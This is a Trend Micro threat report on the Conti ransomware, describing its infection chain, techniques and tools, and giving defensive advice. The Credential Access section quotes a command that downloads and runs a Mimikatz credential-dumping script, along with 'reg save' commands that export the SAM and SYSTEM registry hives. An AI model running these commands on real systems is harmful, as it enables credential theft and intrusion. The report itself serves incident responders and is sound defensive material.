Ransomware Spotlight: Conti

By Trend Micro Research

Assumed to be the successor of the Ryuk ransomware, Conti is currently one of the most notorious active ransomware families used in high-profile attacks. Know all about this ransomware family and protect your company against this threat.


What do you need to know about Conti ransomware to help secure your organization?

Assumed to be the successor of the Ryuk ransomware, Conti is currently one of the most notorious active ransomware families, and is used as a ransomware-as-a-service (RaaS) in high-profile attacks such as those launched against healthcare institutions in Ireland and New Zealand.

Conti operators also leverage double extortion techniques, and have resorted to not just publishing stolen data, but also selling access to victim organizations that refused to pay the ransom.

Delivered through stealthy mechanisms such as BazarLoader, along with other tricks up its sleeve, the Conti ransomware family had the tenth-highest number of attack attempts detected in the first half of the year, as reported in the Trend Micro 2021 Midyear Cybersecurity Report.

This article details the Conti ransomware to help incident responders and security teams spot attacks more easily.


Top affected industries and countries

Conti attacks have been detected all over the globe, with the US amassing over a million attack attempts from January 1 to November 12, 2021. The Netherlands and Taiwan ranked second and third respectively.

Figure 1. Countries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021)
Source: Trend Micro™ Smart Protection Network™ infrastructure

The retail industry saw the most Conti attack attempts, followed by insurance, manufacturing, and telecommunications. Healthcare, which Conti operators targeted in high-profile attacks this year, is sixth on the list.

Figure 2. Industries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021)
Source: Trend Micro™ Smart Protection Network™ infrastructure

Infection chain and techniques

Figure 3. Conti infection chain


Initial Access

  • Conti can arrive in the system through BazarLoader, which is delivered via phishing emails containing a Google Drive link that downloads the malware.
  • Alternatively, the ransomware can arrive via exploitation of the FortiGate firewall vulnerabilities CVE-2018-13379 and CVE-2018-13374. After successfully exploiting the application, the operators deploy Cobalt Strike to gain a foothold on the system.
  • Conti can also arrive as a result of the exploitation of the ProxyShell Microsoft Exchange vulnerabilities.

Discovery

  • For initial reconnaissance, the Conti group uses tools such as Whoami, Nltest, and Net. These tools give the operators information about where they are in the system, and what rights and permissions they have.
  • Since the operators employ double extortion tactics, they actively look for files to exfiltrate in the discovery stage. The threat actors use tools such as ShareFinder to identify the shares needed for exfiltration and ransomware deployment.

Privilege Escalation

  • Although the group mostly relies on finding domain admin credentials to gain full access to the domain, they may also use exploits such as Zerologon (CVE-2020-1472) and PrintNightmare (CVE-2021-1675) to elevate their privileges and further strengthen their foothold in the network.

Credential Access

  • The attackers dump cached credentials on systems to allow them to move laterally or elevate their privileges. They use tools such as ProcDump to dump the memory of system processes (usually lsass.exe) and then use Mimikatz on the dump to extract credentials.
  • In other cases, they may use mass-mimikatz, a module from Empire, to dump the credentials on multiple systems.
    • Mimikatz (mass-mimikatz, from Empire)
      C:\WINDOWS\SYSTEM32\WBEM\WMIC.exe /node:localhost process call create powershell /c IEX (NewObjectNet.WebClient).DownloadString('https://raw.githubusercontent[.]com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'24346D,COMPUTERNAME2'|Invoke-MassMimikatz -Verbose > c:/programdata/2.txt
  • Alternatively, they may also use the kerberoasting module of the PowerShell empire or use tools like Rubeus.
  • The attackers may also use native Windows tools, such as Task Manager, to dump the memory of lsass or use the comsvcs DLL file’s MiniDump function.
  • They also gain access to the credentials by taking them out of password stores.
    • One of the ways to do this is through “reg save” commands.
      - reg save HKLM\SAM C:\programdata\SamBkup.hiv
      - reg save HKLM\SYSTEM C:\programdata\FileName.hiv
    • They can also use tools such as Get-GPPPassword to get plaintext passwords stored in Group Policy Preferences.
  • They can also gain credentials from browsers and cloud applications using tools such as SharpChrome and SeatBelt.
  • After gaining enough credentials, they use SMBAutoBrute to automate brute-forcing with the collected passwords and find which ones work.
  • After gaining information on the domain accounts, the attackers then dump the domain controller credentials using Ntdsutil.
  • Alternatively, they can also use Vssadmin to create a snapshot of the system and download Ntds.dit to accomplish this.

Lateral Movement

  • The attackers can also use batch files to disable security tools. These files are executed through scheduled tasks.
  • The groups are also known to use third-party tools such as Atera and AnyDesk to control remote systems.
  • The operators are also known to use EternalBlue to move laterally in the network of systems that are vulnerable to this exploit.
  • They also use PSExec to remotely execute scripts and the ransomware itself.

Defense Evasion

  • Just before the execution of the ransomware, threat actors create a series of batch files to automate the distribution of its tools in the domain. These tools include scripts to terminate existing security software.
  • The operators can also use other tools, like GMER, PC Hunter, and PowerShell, to accomplish this.

Execution

  • Ties to the Trickbot gang gave Conti operators the ability to execute the ransomware via BazarLoader, which leads to Cobalt Strike, which eventually leads to the ransomware itself.
  • Once the actors are inside the network, they tend to use scheduled tasks and batch files as a means of execution on remote systems.
  • Alternatively, the operators can execute the ransomware through a helper such as the DontSleep.exe process, which opens Task Manager, from which the ransomware file is launched.

Exfiltration

  • The attackers perform data exfiltration on the system with the use of the Rclone tool, which is an open-source tool used for syncing files to a specified cloud storage, such as Mega cloud storage.
  • The group can also use WinSCP to exfiltrate data.

Impact

  • After exfiltration and distribution of the ransomware to the targeted endpoints, the files are encrypted using ChaCha20, with RSA-4096 used to protect the ChaCha key and nonce.
  • The ransomware also inhibits system recovery by deleting shadow copies using WMI.

MITRE tactics and techniques

Tactics covered: Initial Access, Execution, Persistence, Privilege Escalation, Credential Access, Lateral Movement, Defense Evasion, Command and Control, Exfiltration, Impact

T1566 - Phishing
Arrives via phishing emails with BazarLoader

T1190 - Exploit public-facing application
Arrives via firewall exploits (CVE-2018-13379 and CVE-2018-13374)

T1106 - Execution through API
Uses native API to execute commands such as deleting shadow copies

T1059.003 - Command and scripting interpreter: Windows command shell
Uses batch files to distribute and execute ransomware

T1047 - Windows Management Instrumentation
Uses WMI to execute batch files and delete shadow copies

T1204 - User execution
User execution is needed to carry out the payload from the spear phishing link

T1053.005 - Scheduled task/job: scheduled task
Uses scheduled tasks as a means of execution for the ransomware

T1078.002 - Valid accounts: domain accounts
Uses domain administrator accounts to escalate privilege in the system

T1083 - File and directory discovery
Searches for specific files and directories related to its encryption

T1018 - Remote system discovery
Enumerates ARP entries to enable distribution to remote systems

T1057 - Process discovery
Discovers certain processes for process termination

T1016 - System network configuration discovery
Enumerates ARP entries to enable distribution to remote systems

T1069.002 - Permission groups discovery: domain groups
Searches for group information for privilege escalation

T1082 - System information discovery
Collects and logs information about the system

T1033 - System owner/user discovery
Performs user discovery for privilege escalation

T1012 - Query registry
Queries certain registry keys for stored passwords

T1063 - Security software discovery
Discovers security software for reconnaissance and termination
T1003 - OS credential dumping
Dumps LSASS memory to be used for retrieving password hashes

T1555 - Credentials from password stores
Extracts passwords from credential stores using tools such as SharpChrome, Seatbelt, and net-GPPPassword

T1552 - Unsecured credentials
Retrieves credentials using Mimikatz 

T1570 - Lateral tool transfer
Uses BITSAdmin to transfer tools across the network

T1021.002 - Remote services: SMB/Windows admin shares
Cobalt Strike uses admin shares to distribute itself to remote systems

T1562.001 - Impair defenses: disable or modify tools
Terminates certain security related software

T1140 - Deobfuscate/Decode files or information
Ransomware is obfuscated to make detection more difficult

T1055 - Process injection
Uses process injection to make detection more difficult

T1071 - Application Layer Protocol
Uses HTTP to communicate with its C&C server

T1219 - Remote access software
Uses RMM software such as AnyDesk and Atera

T1567.002 - Exfiltration over web service: exfiltration to cloud storage
Syncs files to a specified cloud storage, such as Mega cloud storage.

T1486 - Data encrypted for impact
Uses ChaCha20 and RSA4096 to encrypt the files and key

T1489 - Service stop
Uses tools such as PC Hunter and GMER to terminate certain security-related services

T1490 - Inhibit system recovery
Uses WMIC to delete shadow copies

Summary of malware, tools, and exploits used

Security teams can watch out for the presence of the following malware, tools, and exploits that are typically used in Conti attacks:

Stages covered: Initial Entry, Execution, Discovery, Privilege Escalation, Credential Access, Lateral Movement, Defense Evasion, Exfiltration, Command and Control
  • Phishing emails
  • Firewall exploits (CVE-2018-13379 and CVE-2018-13374)
  • BazarLoader/BazarBackdoor
  • Cobalt Strike
  • DontSleep
  • Adfind
  • Net
  • NetScan
  • Nltest
  • ShareFinder
  • SharpView
  • PowerUpSQL
  • Whoami
  • EternalBlue (Ms17_010)
  • Mimikatz
  • PowerUpSQL
  • PrintNightmare (CVE-2021-1675)
  • RouterScan
  • Zerologon (CVE-2020-1472)
  • EComsvcs.dll
  • Mimikatz
  • Net-GPPPassword
  • Ntdsutil
  • PowerShell Empire: Kerberoast
  • ProcDump
  • RouterScan
  • Rubeus
  • SharpChrome
  • SMB AutoBrute
  • Task Manager
  • Vssadmin
  • AnyDesk
  • Atera
  • BITSAdmin
  • Cobalt Strike
  • EternalBlue
  • Mimikatz
  • PsExec
  • AV Uninstall
  • Cobeacon
  • GMER
  • Gpedit
  • PCHunter
  • PowerTool
  • KillAV
  • Rclone
  • WinSCP
  • Anydesk
  • Atera
  • Cobalt Strike
  • GOST (GO Simple Tunnel)
  • NGROK

Recommendations

To help defend systems against similar threats, organizations can establish security frameworks, which can allocate resources systematically for establishing a solid defense against ransomware.

Here are some best practices that can be included in these frameworks:
Audit and inventory

  • Take an inventory of assets and data
  • Identify authorized and unauthorized devices and software
  • Make an audit of event and incident logs

Configure and monitor

  • Manage hardware and software configurations
  • Grant admin privileges and access only when necessary to an employee’s role
  • Monitor network ports, protocols, and services
  • Activate security configurations on network infrastructure devices such as firewalls and routers
  • Establish a software allow list that only executes legitimate applications

Patch and update

  • Conduct regular vulnerability assessments
  • Perform patching or virtual patching for operating systems and applications
  • Update software and applications to their latest versions

Protect and recover

  • Implement data protection, backup, and recovery measures
  • Enable multifactor authentication

Secure and defend

  • Employ sandbox analysis for blocking malicious emails
  • Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network
  • Detect early signs of an attack such as the presence of suspicious tools in the system
  • Use advanced detection technologies such as those powered by AI and machine learning

Train and test

  • Regularly train and assess employees on security skills
  • Do red-team exercises and penetration tests

A multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior could help protect enterprises.

  • Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on before the ransomware can do irreversible damage to the system.
  • Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning. 
  • Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.
  • Trend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.

Indicators of Compromise

Actual indicators might vary per attack.


Published in Ransomware Spotlight, Ransomware